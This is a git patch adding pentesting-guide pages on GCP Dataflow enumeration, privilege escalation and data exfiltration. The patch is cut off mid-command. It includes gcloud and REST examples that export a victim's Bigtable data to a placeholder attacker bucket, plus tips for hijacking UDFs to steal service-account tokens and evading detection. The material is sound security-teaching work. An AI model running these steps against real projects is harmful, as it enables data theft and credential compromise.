From 936fbc42858cf0140f28cb4af7ff3d3fd2ca5060 Mon Sep 17 00:00:00 2001 From: Tamir Yehuda Date: Sun, 15 Feb 2026 21:34:08 +0200 Subject: [PATCH 1/2] added new GCP Dataflow exploitation, privilege escalation, and enumeration sections --- src/SUMMARY.md | 3 + .../gcp-dataflow-post-exploitation.md | 49 +++++ .../gcp-dataflow-privesc.md | 173 ++++++++++++++++++ .../gcp-services/gcp-dataflow-enum.md | 79 ++++++++ 4 files changed, 304 insertions(+) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 7a747fe46..321048f71 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -95,6 +95,7 @@ - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) - [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) + - [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md) - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) @@ -123,6 +124,7 @@ - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) - [GCP - Dataproc 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md) + - [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md) - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) @@ -176,6 +178,7 @@ - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) + - [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md) - [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md) - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md new file mode 100644 index 000000000..ae2ce9859 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md @@ -0,0 +1,49 @@ +# GCP - Dataflow Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Dataflow + +For more information about Dataflow check: + +{{#ref}} +../gcp-services/gcp-dataflow-enum.md +{{#endref}} + +### Using Dataflow to exfiltrate data from other services + +**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source 
and sink)

With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique once you have obtained Dataflow access, for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).

> [!NOTE]
> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. If no service account is specified, the Compute Engine default SA is used.

#### Bigtable to GCS

See the "Dump rows to your bucket" section in [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
**Export Bigtable to attacker-controlled bucket**

```bash
gcloud dataflow jobs run <JOB_NAME> \
  --gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<VICTIM_PROJECT_ID> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<VICTIM_PROJECT_ID>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<ATTACKER_BUCKET>/raw-json/ \
  --staging-location=gs://<ATTACKER_BUCKET>/staging/
```
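The same launch can also be issued without gcloud through the Dataflow REST API (`projects.locations.templates.launch`, API version `v1b3`). Below is a minimal sketch of the request body mirroring the gcloud command above; every project, instance, table, and bucket name is a placeholder, not a real resource:

```python
# Sketch: JSON body for a Dataflow templates.launch call that runs the
# Cloud_Bigtable_to_GCS_Json template. All identifiers are placeholders.

def build_launch_body(job_name, victim_project, instance_id, table_id, attacker_bucket):
    """Body for POST .../v1b3/projects/<PROJECT>/locations/<REGION>/templates:launch"""
    return {
        "jobName": job_name,
        "parameters": {
            # Same template parameters as the gcloud invocation above
            "bigtableProjectId": victim_project,
            "bigtableInstanceId": instance_id,
            "bigtableTableId": table_id,
            "filenamePrefix": "dump",
            "outputDirectory": f"gs://{attacker_bucket}/raw-json/",
        },
        "environment": {
            # Staging/temp files also land in the attacker bucket
            "tempLocation": f"gs://{attacker_bucket}/staging/",
        },
    }

body = build_launch_body("etl-cleanup", "victim-project", "prod-bt",
                         "customers", "attacker-bucket")
print(body["parameters"]["outputDirectory"])  # gs://attacker-bucket/raw-json/
```

An innocuous-looking `jobName` (e.g. `etl-cleanup`) helps the export blend in with legitimate pipelines in the console.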
+ +#### BigQuery to GCS + +Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket. + +#### Pub/Sub and streaming sources + +Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md new file mode 100644 index 000000000..ddbbf3b5c --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md @@ -0,0 +1,173 @@ +# GCP - Dataflow Privilege Escalation + +{{#include ../../../banners/hacktricks-training.md}} + +## Dataflow + +{{#ref}} +../gcp-services/gcp-dataflow-enum.md +{{#endref}} + +### `storage.objects.create`, `storage.objects.get`, `storage.objects.update` + +Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. +With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing. +Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling). + +**Attack vectors:** +- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets +- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets + + +> [!WARNING] +> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. 
Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line. + + +#### Direct exploitation via gcloud CLI + +1. Enumerate Dataflow jobs and locate the template/UDF GCS paths: + +
**List and describe jobs to get the template path, staging location, and UDF references**

```bash
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<REGION>
gcloud dataflow jobs list --project=<PROJECT_ID>

# Describe a job to get the template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<REGION> --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```
+ +2. Download the original UDF or job template from GCS: + +
**Download UDF file or YAML template from bucket**

```bash
# If the job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<UDF_FILE>.py ./udf_original.py

# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/